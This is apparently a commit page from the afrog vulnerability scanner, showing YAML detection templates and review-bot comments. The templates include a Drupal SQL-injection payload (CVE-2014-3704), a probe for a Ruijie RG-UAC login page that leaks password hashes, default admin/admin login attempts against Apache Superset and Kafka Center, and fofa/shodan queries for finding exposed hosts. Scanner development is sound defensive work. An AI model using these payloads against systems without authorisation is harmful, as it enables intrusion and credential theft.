Projects STRLCPY afrog Commits 004321db
  • ■ ■ ■ ■ ■ ■
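--- a/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
+++ b/afrog-pocs/CNVD/2021/CNVD-2021-14536.yaml
@@ -1,15 +1,17 @@
 id: CNVD-2021-14536
 
 info:
- name: 锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞
- author: jweny(https://github.com/jweny)
+ name: Ruijie RG-UAC Information Disclosure
+ author: jweny(https://github.com/jweny) daffainfo
  severity: high
+ description: |
+ fofa-query: 'title="RG-UAC登录页面"'
 
 rules:
  r0:
  request:
  method: GET
  path: /login.php
- expression: response.status == 200 && response.body.bcontains(b"<title>RG-UAC</title>") && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
+ expression: response.status == 200 && response.body.bcontains(b"get_dkey_passwd") && "\"password\":\"[a-f0-9]{32}\"".bmatches(response.body)
 expression: r0()
 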
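Review bot: The added `description: |` carries only the `fofa-query` line, so the template never states what is disclosed or what an operator should do about a hit; `afrog-pocs/default-pwd/kafka-center-default-password.yaml` in this commit has the same shape with its `shodan-query`. Going by the expression, the finding is a `"password"` field holding a 32-character hex value in the `/login.php` response, and the description should say so, for example `GET /login.php returns a "password" field containing a 32-hex-character hash without authentication.` The same edit drops the `<title>RG-UAC</title>` condition, which leaves `get_dkey_passwd` as the only product fingerprint; if that string is not specific to RG-UAC, keeping the title check would limit false positives. Indentation is not visible on this page, so whether `fofa-query` sits inside the block scalar could not be confirmed.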
  • ■ ■ ■ ■ ■ ■
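--- a/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
+++ b/afrog-pocs/CNVD/2021/CNVD-2021-15822.yaml
@@ -4,6 +4,8 @@
  name: ShopXO File Read
  author: Print1n(http://print1n.top)
  severity: high
+ reference:
+ - https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
 
 rules:
  Linux0: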
  • ■ ■ ■ ■ ■ ■
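--- a/afrog-pocs/CVE/2014/CVE-2014-3704.yaml
+++ b/afrog-pocs/CVE/2014/CVE-2014-3704.yaml
@@ -5,13 +5,15 @@
  author: unkown
  severity: high
 
+set:
+ rand: randomInt(200000000, 210000000)
 rules:
  r0:
  request:
  method: POST
  path: /?q=node&destination=node
- body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(666)),1)%23]=bob&name[0]=a
- expression: response.status == 500 && response.body.bcontains(b"PDOException") && response.body.bcontains(b"fae0b27c451c728867a567e8c1bb4e53")
+ body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0,concat(0xa,(select md5({{rand}}))),0)%23]=bob&name[0]=a
+ expression: response.status == 500 && response.body.bcontains(bytes(substr(md5(string(rand)), 0, 31)))
 expression: r0()
 
 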
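Review bot: The `31` in `substr(md5(string(rand)), 0, 31)` on the new `expression` line is unexplained, and a later editor could easily "correct" it to 32 and silently break the match. It appears to follow from the database error text being cut at 32 characters with the leading `0xa` taking one of them, so a comment above the rule such as `# error text is truncated to 32 chars; 0xa uses one, so only 31 hex chars of the md5 are echoed` would record that. The new expression also no longer requires `PDOException`; with a per-run random marker that is probably fine, but it is worth confirming the removal was deliberate.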
  • ■ ■ ■ ■ ■ ■
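--- a/afrog-pocs/CVE/2021/CVE-2021-44451.yaml
+++ b/afrog-pocs/CVE/2021/CVE-2021-44451.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-44451
+
+info:
+ name: Apache Superset Default Password
+ author: dhiyaneshDK
+ severity: high
+ description: |
+ Apache Superset up to and including 1.3.2 allowed for registered database connections password leak for authenticated users. This information could be accessed in a non-trivial way.
+ Users should upgrade to Apache Superset 1.4.0 or higher.
+ Fofa: app="APACHE-Superset"
+ reference:
+ - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/apache-superset-default-credentials.json
+ - https://nvd.nist.gov/vuln/detail/CVE-2021-44451
+
+set:
+ refererUrl: request.url
+rules:
+ r0:
+ request:
+ method: GET
+ path: /login/
+ expression: response.status == 200
+ output:
+ search: '"value=\"(?P<cs_token>.*?)\">".bsubmatch(response.body)'
+ cs_token: search["cs_token"]
+ r1:
+ request:
+ method: POST
+ path: /login/
+ headers:
+ Referer: "{{refererUrl}}/admin/airflow/login"
+ body: |
+ csrf_token={{cs_token}}&username=admin&password=admin
+ expression: response.status == 302 && response.body.bcontains(b'<title>Redirecting...</title>') && response.body.bcontains(b'<h1>Redirecting...</h1>') && response.body.bcontains(b'<a href="/">') && response.raw_header.bcontains(b'session')
+expression: r0() && r1()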
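Review bot: The check in `r1` posts `username=admin&password=admin` to `/login/`, which tests for a default credential, while the `id` and `description` are those of CVE-2021-44451, described here as a database-connection password leak for authenticated users that is fixed by upgrading to 1.4.0. A hit would be reported under a CVE whose remediation (upgrade) does not remove the actual problem (an unchanged admin password). The template fits better under `afrog-pocs/default-pwd/` next to `kafka-center-default-password.yaml`, with a description that tells the operator to change the default password. The `Referer` value `{{refererUrl}}/admin/airflow/login` looks carried over from an Airflow template and should probably point at the Superset login URL. `body: |` also keeps a trailing newline, which may end up inside the `password` value depending on how the engine sends the body; `body: |-` avoids that.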
  • ■ ■ ■ ■ ■ ■
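--- a/afrog-pocs/default-pwd/kafka-center-default-password.yaml
+++ b/afrog-pocs/default-pwd/kafka-center-default-password.yaml
@@ -0,0 +1,20 @@
+id: kafka-center-default-password
+
+info:
+ name: Apache Kafka Center Default Password
+ author: dhiyaneshDK
+ severity: high
+ description: |
+ shodan-query: http.title:"Kafka Center"
+
+rules:
+ r0:
+ request:
+ method: POST
+ path: /login/system
+ headers:
+ Content-Type: application/json
+ body: |
+ {"name":"admin","password":"admin","checkbox":false}
+ expression: response.status == 200 && response.body.bcontains(b'"code":200') && response.body.bcontains(b'"name":"admin"')
+expression: r0()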
  • afrog-pocs/unreviewed/CVE-2022-22965.yaml pocs/CVE-2022-22965.yaml
    Content is identical